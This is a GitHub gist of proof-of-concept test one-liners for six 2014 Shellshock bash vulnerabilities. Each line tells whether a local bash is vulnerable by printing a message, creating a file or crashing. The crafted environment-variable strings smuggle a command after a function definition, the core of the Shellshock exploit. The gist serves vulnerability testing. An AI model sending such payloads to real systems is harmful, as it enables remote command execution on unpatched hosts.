Skip to content

Instantly share code, notes, and snippets.

@sgviking

sgviking/shellshock_poc.md

Last active October 29, 2020 11:05
Show Gist options
  • Save sgviking/99f51a73665d8e52f50b to your computer and use it in GitHub Desktop.
Save sgviking/99f51a73665d8e52f50b to your computer and use it in GitHub Desktop.
Download ZIP
PoC for 6 shellshock CVE's
Raw
shellshock_poc.md

shellshock PoC/test code

CVE-2014-6271

env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id

CVE-2014-7169

# will create a file named echo in cwd with date in it, if vulnerable
env X='() { (a)=>\' bash -c "echo date"; cat echo

CVE-2014-7186

Taken from http://en.m.wikipedia.org/wiki/Shellshock_(software_bug)#CVE-2014-7186

bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo "CVE-2014-7186 vulnerable, redir_stack"

CVE-2014-7187

Taken from http://en.m.wikipedia.org/wiki/Shellshock_(software_bug)#CVE-2014-7187

(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"

CVE-2014-6277

Taken from @mubix https://github.com/mubix/shellshocker-pocs

will segfault if vulnerable

() { x() { _; }; x() { _; } <<a; }

Additional discussion on fulldisclosure: http://seclists.org/fulldisclosure/2014/Oct/9

CVE-2014-6278

Taken from @mubix https://github.com/mubix/shellshocker-pocs

() { _; } >_[$($())] { echo hi mom; id; }

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment